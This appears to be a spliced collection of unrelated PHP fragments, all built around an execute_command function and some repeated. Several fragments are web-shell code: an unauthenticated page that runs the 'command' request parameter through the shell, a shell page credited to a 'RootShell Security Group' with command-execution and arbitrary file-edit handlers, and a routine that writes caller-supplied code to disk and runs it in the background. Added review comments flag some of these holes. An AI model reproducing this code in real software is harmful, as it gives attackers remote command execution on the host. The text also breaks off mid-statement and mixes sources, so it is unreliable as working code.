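/**
 * Locate an executable on the search path.
 *
 * Asks the platform lookup tool (`where` on Windows, `/usr/bin/which`
 * elsewhere) for the program and returns the first line it reports.
 *
 * @param string $program
 *   A single program name to look up.
 *
 * @return string|false
 *   The first entry returned by execute_command(), or false when the lookup
 *   produced nothing usable.
 */
function get_program_path($program)
{
    $is_windows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
    $which = $is_windows ? 'where' : '/usr/bin/which';

    // Pass the name as exactly one shell argument. Concatenating it raw lets
    // spaces or shell metacharacters in $program change the command that runs.
    $data = execute_command($which . ' ' . escapeshellarg((string) $program));
    if (!$data) {
        return false;
    }

    return !empty($data[0]) ? $data[0] : false;
}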
/**
 * Execute a list of CLI commands in order, expanding variables first.
 *
 * Each command is echoed with a ">> " prefix before it runs, followed by its
 * output, one line per row. The first exception stops the whole run: its
 * message is printed and the process exits with status 1.
 *
 * NOTE(review): the substituted values become part of a command line. Whether
 * parse_command() quotes them for the shell is not visible here; confirm
 * before feeding it values that did not come from trusted configuration.
 *
 * @param $commands
 *   Array of CLI command templates, which may contain variables to
 *   substitute.
 * @param $variables
 *   A key/value array of variables which may be substituted into the commands
 *   before execution.
 */
function run_commands($commands, $variables)
{
    foreach ($commands as $template) {
        try {
            $resolved = parse_command($template, $variables);
            echo '>> ' . $resolved . PHP_EOL;

            foreach (execute_command($resolved) as $row) {
                echo $row . PHP_EOL;
            }
        } catch (Exception $e) {
            echo $e->getMessage() . PHP_EOL;
            exit(1);
        }
    }
}
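do_refresh_button(); ?>
<?php
/**
 * Run a command line through the system shell and print the command and its
 * combined stdout/stderr as an HTML fragment, followed by a timestamp.
 *
 * The command string is executed verbatim: nothing in this function limits
 * which program runs or with which arguments.
 *
 * @param string $command Command line to run; empty input prints nothing.
 */
function execute_command($command = "")
{
    if (is_string($command) && !empty($command)) {
        // Backticks are shell_exec(); the result is null when the command
        // fails or prints nothing, so normalise before escaping.
        $output = `{$command} 2>&1`;
        $output = htmlentities((string) $output);

        // The command is echoed into the page too, so it needs the same
        // escaping as the output or it can inject markup into the response.
        $shown_command = htmlentities($command);

        print "<h2>{$shown_command}</h2>";
        print "<p><pre>{$output}</pre></p>";
        print "<hr><p>Last update on ";
        print date(DATE_RFC822);
        print "</p>";
    }
}
?>
<?php
// NOTE(review): the request parameter reaches the shell unchanged, and no
// authentication or allow-list is visible in this excerpt. Anyone who can
// request this page can run commands as the PHP process user. Put it behind
// authentication and a fixed set of permitted commands, or keep it off
// deployed hosts.
$command = isset($_REQUEST['command']) ? $_REQUEST['command'] : ''; // grab user input
execute_command($command);
?>
<?php do_refresh_button(); ?>
</body>
</html>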
// Tail of a function whose beginning is outside this excerpt (presumably
// complete_expr(), which the loop below calls -- confirm). Here the expression
// is prefixed so that evaluating it assigns the result to $__rs.
$code = '$__rs = ' . $code; }
// Terminate the statement unless it already ends in ';' or '}'.
if ($last_char !== ';' && $last_char !== '}') { $code .= ';'; }
// var_dump($code);
// This path returns no built-in command, only PHP code to evaluate.
return array(null, $code); }

/**
 * Handle a built-in shell command. Only 'quit' is recognised; it ends the
 * process. Any other value is ignored.
 */
function execute_command($cmd) { if ($cmd === 'quit') { exit; } }

// Interactive read-evaluate-print loop on standard input.
while (true) {
    echo "phpsh > ";
    // Reads at most 1000 bytes per iteration.
    $str = fread(STDIN, 1000);
    // NOTE(review): at end of input fread() yields an empty result, so this
    // `continue` repeats forever; a closed or redirected STDIN makes the loop spin.
    if (empty($str)) { continue; }
    list($cmd, $code) = complete_expr($str);
    // eval() runs the typed text as PHP inside this script, with the full
    // rights of the process. That is the point of a local REPL, and the reason
    // this loop must only ever be fed from a trusted terminal.
    if ($cmd) { execute_command($cmd); } elseif ($code) { eval($code); }
    // Show the value the evaluated code assigned, then clear it for the next round.
    if (isset($__rs)) { var_dump($__rs); unset($__rs); }
}
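/**
 * Send a thumbnail preview for an image file or, when ImageMagick is enabled
 * and a writable cache directory exists, for the first page of a PDF.
 *
 * JPEG, PNG and GIF files go straight to send_thumb(). A PDF is first rendered
 * to a cached JPEG under ./thumbs (named by the SHA-1 of $file) and that JPEG
 * is sent. Any other file type produces no output.
 *
 * Reads $_GET['big'] to choose between the small (80x55) and big (440x280)
 * preview size.
 *
 * @param string $file Path of the file to preview.
 *
 * @return void
 */
function tfu_preview($file)
{
    global $use_image_magic, $image_magic_path;

    // PDF previews need a caching directory next to this script that exists
    // and is writable.
    $thumbs_dir = dirname(__FILE__) . '/thumbs';
    $pdf_preview = file_exists($thumbs_dir) && is_writable($thumbs_dir);

    // The big preview is roughly four times the small one.
    $big = isset($_GET['big']);
    $width = $big ? 440 : 80;
    $height = $big ? 280 : 55;

    // Thumbnails are generated directly for jpg/jpeg, png and gif.
    if (preg_match('/\.(jpe?g|png|gif)$/i', $file)) {
        send_thumb($file, 90, $width, $height);
        return;
    }

    // Everything else is previewed only if it is a PDF and conversion is possible.
    if (!preg_match('/\.pdf$/i', $file) || !$use_image_magic || !$pdf_preview) {
        return;
    }

    $cachename = $thumbs_dir . '/' . sha1($file) . '.jpg';
    if (!file_exists($cachename)) {
        $ima = realpath($file);
        if ($ima === false) {
            // The source file cannot be resolved, so there is nothing to render.
            return;
        }
        // File names come from uploads, so the paths are passed with
        // escapeshellarg(). Hand-written double quotes still let the shell
        // expand `$(...)`, backticks and embedded quotes inside the name.
        $command = $image_magic_path
            . ' ' . escapeshellarg($ima . '[0]')
            . ' -border 1x1 -quality 80 -thumbnail 1000x1000 '
            . escapeshellarg($cachename);
        execute_command($command);
    }

    // The cached file is not removed here; the original comment says the
    // thumbs folder is cleaned up regularly.
    send_thumb($cachename, 90, $width, $height);
}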
$header .= ' [<a href="?p=' . $page . '&dir=' . realpath('.') . '">' . $page_name . '</a>] '; } $header .= '<br><hr>' . show_dirs('.') . '</td><tr><td>'; print $header; $footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; // //Page handling // if (isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Run command print "<form action=\"" . $me . "?p=cmd&dir=" . $_GET['dir'] . "\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; if (isset($_REQUEST['command'])) { print "<pre>"; execute_command(get_execution_method(), $_REQUEST['command']); //You want fries with that? } break; case 'edit': //Edit a fie if (isset($_POST['editform'])) { $f = $_GET['file']; $fh = fopen($f, 'w') or print "Error while opening file!"; fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; fclose($fh); } print "Editing file <b>" . $_GET['file'] . "</b> (" . perm($_GET['file']) . ")<br><br><form action=\"" . $me . "?p=edit&file=" . $_GET['file'] . "\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; $rd = file($_GET['file']); foreach ($rd as $l) { print htmlspecialchars($l);
/**
 * Write $code to a new file and run it with the program given in $location.
 *
 * The file is created in the directory held in $_SESSION["daws_directory"]
 * and named "<unix timestamp>.<extension>". Nothing in this function validates
 * $code, $location or $extension, and nothing removes the file afterwards.
 * Whatever the caller supplies is stored on disk and executed with the rights
 * of the PHP process.
 *
 * When no output is wanted the command is detached and its output discarded:
 * via "START /B" when $_SESSION["windows"] is set (the "> null" redirect names
 * a regular file called "null", not a device), otherwise via nohup if
 * execute_command("nohup", True) reports it as usable.
 *
 * @param string $code          Script source to write out.
 * @param string $location      Program used to run the script.
 * @param string $extension     File extension for the script file.
 * @param bool   $output_needed Whether the caller wants the command output.
 *
 * @return mixed Whatever execute_command() returns for the final command line.
 */
function execute_script($code, $location, $extension, $output_needed = False)
{
    $script_path = $_SESSION["daws_directory"] . "/" . time() . "." . $extension;
    write_to_file($script_path, $code);

    $command_line = $location . " " . $script_path;

    // Background the run only when the caller does not need the output, since
    // the output is thrown away on this path.
    if (!$output_needed) {
        if ($_SESSION["windows"]) {
            $command_line = "START /B {$command_line} > null";
        } elseif (execute_command("nohup", True)) {
            // nohup is used only if it is installed
            $command_line = "nohup {$command_line} > /dev/null 2>&1 &";
        }
    }

    return execute_command($command_line);
}
/**
 * Run a command line after the token/environment check and return its output.
 *
 * initialize() acts as the gate: any truthy value it returns is handed straight
 * back to the caller and the command is not run (presumably an error
 * response for a bad token or environment -- confirm against initialize()).
 * This method places no restriction on $command itself, so the token check is
 * the only thing between a caller and command execution.
 *
 * The output is converted to UTF-8 unconditionally and one trailing newline
 * is removed.
 *
 * @param mixed  $token       Passed to initialize().
 * @param mixed  $environment Passed to initialize().
 * @param string $command     Command line to execute; empty means no command.
 *
 * @return mixed The initialize() result on failure, else array('output' => string).
 */
public function run($token, $environment, $command)
{
    $rejected = $this->initialize($token, $environment);
    if ($rejected) {
        return $rejected;
    }

    $output = '';
    if ($command && !empty($command)) {
        $output = execute_command($command);
    }

    $output = mb_convert_encoding($output, 'UTF-8');

    // Drop a single trailing newline, if there is one.
    $ends_with_newline = $output && substr($output, -1) == "\n";
    if ($ends_with_newline) {
        $output = substr($output, 0, -1);
    }

    return array('output' => $output);
}
header("Content-Type: application/json", true); echo '{"Message":"Error decoding JSON request"}'; exit; } } else { log_message('warn', "Invalid Content-Type in request: " . $_SERVER['CONTENT_TYPE']); header("Content-Type: application/json", true); echo '{"Message":"Content-Type not set or invalid"}'; exit; } } if (isset($request['RequestMethod'])) { $command = trim($request['RequestMethod']); $gMethodName = $command; if ($gMethodName == 'GetGenerics') { $gMethodName .= ' (' . $request['Type'] . ')'; } execute_command($command, $capability, $db, $request); } else { log_message('warn', "Request does not contain a RequestMethod: " . print_r($request, true)); } exit; } else { log_message('warn', "Unhandled request method: " . $_SERVER['REQUEST_METHOD']); header("Content-Type: application/json", true); echo '{"Message":"Unhandled request method"}'; exit; } } } }
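/**
 * Create a resized copy of an image, or a thumbnail of the first page of a
 * PDF, at the size requested in $_GET['tfu_width'] / $_GET['tfu_height'].
 *
 * Images are resized through resize_file() into
 * "<name>-<width>x<height>.<ext>". PDFs are rendered with ImageMagick (only
 * when $use_image_magic is set) into "<name>-<width>.<$pdf_thumb_format>" next
 * to this script, unless that file already exists.
 *
 * Both dimensions must be plain positive integers. Any other value makes the
 * function return without doing anything.
 *
 * @param string $file Path of the source file.
 *
 * @return void
 */
function tfu_createThumb($file)
{
    global $compression, $use_image_magic, $image_magic_path, $pdf_thumb_format;

    // The dimensions come from the query string and end up in a file name and
    // on a shell command line, so only 1-5 digit positive integers pass
    // (the 5-digit cap is a sanity bound chosen here; adjust if larger sizes
    // are legitimate).
    $width = isset($_GET['tfu_width']) ? $_GET['tfu_width'] : null;
    $height = isset($_GET['tfu_height']) ? $_GET['tfu_height'] : null;
    $dimension_pattern = '/^[1-9][0-9]{0,4}$/D';
    if (!is_string($width) || !preg_match($dimension_pattern, $width)
        || !is_string($height) || !preg_match($dimension_pattern, $height)) {
        return;
    }
    $resize = $width . 'x' . $height;

    if (!preg_match('/\.pdf$/i', $file)) {
        $name = removeExtension($file) . '-' . $resize . '.' . getExtension($file);
        resize_file($file, $resize, $compression, basename($file), $name);
        return;
    }

    if (!$use_image_magic) {
        return;
    }

    // create a pdf thumbnail
    $name = dirname(__FILE__) . '/' . removeExtension($file) . '-' . $width . '.' . $pdf_thumb_format;
    if (file_exists($name)) {
        return;
    }

    $ima = realpath($file);
    if ($ima === false) {
        // The source file cannot be resolved, so there is nothing to render.
        return;
    }

    // Paths are passed with escapeshellarg(). Hand-written double quotes
    // still let the shell expand `$(...)`, backticks and embedded quotes
    // inside a file name.
    $command = $image_magic_path
        . ' -colorspace rgb ' . escapeshellarg($ima . '[0]')
        . ' -border 1x1 -quality 80 -thumbnail ' . $resize
        . ' ' . escapeshellarg($name);
    execute_command($command);
}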
/**
 * Store $code in a script file and execute it with the program at $location.
 *
 * The script is written to $_SESSION["daws_directory"] under a name made of a
 * number from rand(1, 1000) plus $extension, so only 1000 distinct names exist
 * per extension. No argument is validated and the file is not deleted here:
 * caller-supplied code lands on disk and runs with the rights of the PHP
 * process.
 *
 * If the caller does not need the output, the command is started in the
 * background with its output discarded: "START /B" when $_SESSION["windows"]
 * is set, otherwise nohup when execute_command("nohup", True) succeeds.
 *
 * @param string $code          Script source to write out.
 * @param string $location      Program used to run the script.
 * @param string $extension     File extension for the script file.
 * @param bool   $output_needed Whether the caller wants the command output.
 *
 * @return mixed Result of execute_command() for the final command line.
 */
function execute_script($code, $location, $extension, $output_needed = False)
{
    $target = $_SESSION["daws_directory"] . "/" . rand(1, 1000) . "." . $extension;
    write_to_file($target, $code);

    $invocation = $location . " " . $target;

    if ($output_needed) {
        // Output wanted: run in the foreground, unmodified.
        return execute_command($invocation);
    }

    // run the script in background and redirect its output to null
    if ($_SESSION["windows"]) {
        $invocation = "START /B {$invocation} > null";
    } elseif (execute_command("nohup", True)) {
        $invocation = "nohup {$invocation} > /dev/null 2>&1 &";
    }

    return execute_command($invocation);
}
/**
 * Execute a command line once initialize() has accepted the token and
 * environment, and return what it printed.
 *
 * A truthy result from initialize() is returned unchanged and nothing is
 * executed (presumably an error payload -- confirm against initialize()).
 * $command is not checked or restricted in this method, so access control
 * rests entirely on that gate.
 *
 * @param mixed  $token       Passed to initialize().
 * @param mixed  $environment Passed to initialize().
 * @param string $command     Command line to execute; empty means no command.
 *
 * @return mixed The initialize() result on failure, else array('output' => string)
 *               with a single trailing newline removed.
 */
public function run($token, $environment, $command)
{
    $early = $this->initialize($token, $environment);
    if ($early) {
        return $early;
    }

    if ($command && !empty($command)) {
        $output = execute_command($command);
    } else {
        $output = '';
    }

    // Strip exactly one trailing newline.
    if ($output && substr($output, -1) == "\n") {
        $output = substr($output, 0, -1);
    }

    return array('output' => $output);
}
echo '{"Message":"Error decoding JSON request"}'; exit; } } else { log_message('warn', "Invalid Content-Type in request: " . $_SERVER['CONTENT_TYPE']); header("Content-Type: application/json", true); echo '{"Message":"Content-Type not set or invalid"}'; exit; } } if (isset($request['RequestMethod'])) { $command = trim($request['RequestMethod']); $gMethodName = $command; if ($gMethodName == 'GetGenerics') { $gMethodName .= ' (' . $request['Type'] . ')'; } execute_command($command, $db, $request); } else { log_message('warn', "Request does not contain a RequestMethod: " . print_r($request, true)); } exit; } else { log_message('warn', "Unhandled request method: " . $_SERVER['REQUEST_METHOD']); header("Content-Type: application/json", true); echo '{"Message":"Unhandled request method"}'; exit; } } } } }